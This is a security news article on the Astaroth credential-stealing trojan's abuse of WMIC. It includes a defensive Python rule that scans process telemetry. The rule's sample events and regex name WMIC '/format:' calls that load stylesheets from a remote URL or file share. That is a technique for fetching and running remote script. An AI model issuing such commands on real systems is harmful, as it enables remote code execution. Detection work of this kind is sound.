Researchers with the Microsoft Defender Advanced Threat Protection Research Team have warned Windows users about the very real threat of a credential-stealing malware known as the “Duke of Hell.” The malware is so dangerous because it hides in plain sight: every file executed in the attack chain is a completely legitimate system tool, so the computer sees nothing that looks wrong.
The trojan is called the Astaroth Trojan, named after the biblical “Great Duke of Hell”. The malware includes clipboard monitoring and keylogging to steal login information. It has become infamous for how it abuses “living off the land binaries” (LOLBins) to do this. In the newly published Microsoft report, the Windows Management Instrumentation Command-line tool (WMIC) was the LOLBin being abused.
Eli Salem, a security researcher with Cybereason who uncovered a previous Astaroth attack, said the attacks are difficult to detect as “the full process of the deployment and execution of the malware” is done through Windows LOLBins. The attacks seem like perfectly legitimate Windows activity to the average user because they are being done by legitimate Windows processes.
However, Lelli explained that “using invisible techniques and being actually invisible are two different things.” Because some of the techniques are so anomalous, Microsoft Defender ATP, the commercial version of the Microsoft Defender Antivirus that ships with Windows 10 free of charge, is able to identify Astaroth attacks.
If you aren’t using Windows Defender ATP, then Salem advises that Windows users take care when “opening anonymous or new .lnk and .zip files that come from suspicious email attachments.” Another warning comes from Kevin Reed, CISO of Acronis. Reed says that fileless malware is an efficient technique that passes by many current anti-malware products without being detected. He says that users should “choose a solution that employs advanced malware detection techniques such as memory scanning, stack trace analysis, and system cell-based directions.” These techniques are designed to expose malware hiding in the PC’s memory.
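The detection idea the article describes, that a legitimate tool such as WMIC becomes visible when it is used in an anomalous way, can be turned into a simple rule over process-creation telemetry. The following is an added example, not code from Microsoft or from the article: it scans constructed process-creation events and flags WMIC when it is told to load a stylesheet from a remote location (`/format:` pointing at an HTTP or UNC path), or when it is launched directly by explorer.exe, as happens when a user double-clicks a shortcut. The specific `/format:` heuristic and the event field layout are assumptions for this example; the article only states that WMIC was abused.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample process-creation events (not real telemetry).
# Field layout assumed for this example: timestamp|parent_image|image|command_line
SAMPLE_EVENTS = [
    "2019-07-08T10:01:02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c echo hello",
    "2019-07-08T10:01:05|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get caption",
    "2019-07-08T10:02:10|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get /format:\"http://example.invalid/a.xsl\"",
    "2019-07-08T10:03:00|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|WMIC.exe process get /FORMAT:\\\\fileshare\\share\\x.xsl",
]

# The image we care about: any path ending in \wmic.exe, case-insensitive.
WMIC_IMAGE = re.compile(r"\\wmic\.exe$", re.IGNORECASE)

# Assumed heuristic: /format: followed by an http(s) URL or a UNC path (two backslashes).
# Legitimate local use of /format: names a built-in or local stylesheet instead.
REMOTE_FORMAT = re.compile(r"/format:\s*\"?(https?://|\\\\)", re.IGNORECASE)


@dataclass
class Alert:
    timestamp: str
    command_line: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> Tuple[str, str, str, str]:
    """Split one pipe-delimited event into its four fields."""
    ts, parent, image, cmd = line.split("|", 3)
    return ts, parent, image, cmd


def classify(line: str) -> List[str]:
    """Return the list of reasons an event is suspicious (empty if benign)."""
    ts, parent, image, cmd = parse_event(line)
    reasons: List[str] = []
    if not WMIC_IMAGE.search(image):
        return reasons  # only WMIC executions are examined here
    if REMOTE_FORMAT.search(cmd):
        reasons.append("wmic /format: points at a remote stylesheet")
    if parent.lower().endswith("\\explorer.exe"):
        reasons.append("wmic launched directly from explorer.exe (user-opened file)")
    return reasons


def scan(lines: List[str]) -> List[Alert]:
    """Run classify() over every event and collect those with at least one reason."""
    alerts = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            ts, _, _, cmd = parse_event(line)
            alerts.append(Alert(ts, cmd, reasons))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert.timestamp, "|", alert.command_line)
        for reason in alert.reasons:
            print("   -", reason)
```

On the constructed events, the plain `wmic os get caption` run from an administrator's shell produces no alert, while the two invocations that fetch a stylesheet from a URL or a file share are flagged, and the one launched straight from explorer.exe collects a second reason. In production the same rule would be run against Sysmon event ID 1 or an EDR's process-creation stream rather than a hard-coded list.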
This is not the first time that the Astaroth malware has hit, and doubtless it will not be the last. As long as you stay careful out there, though, you should be okay.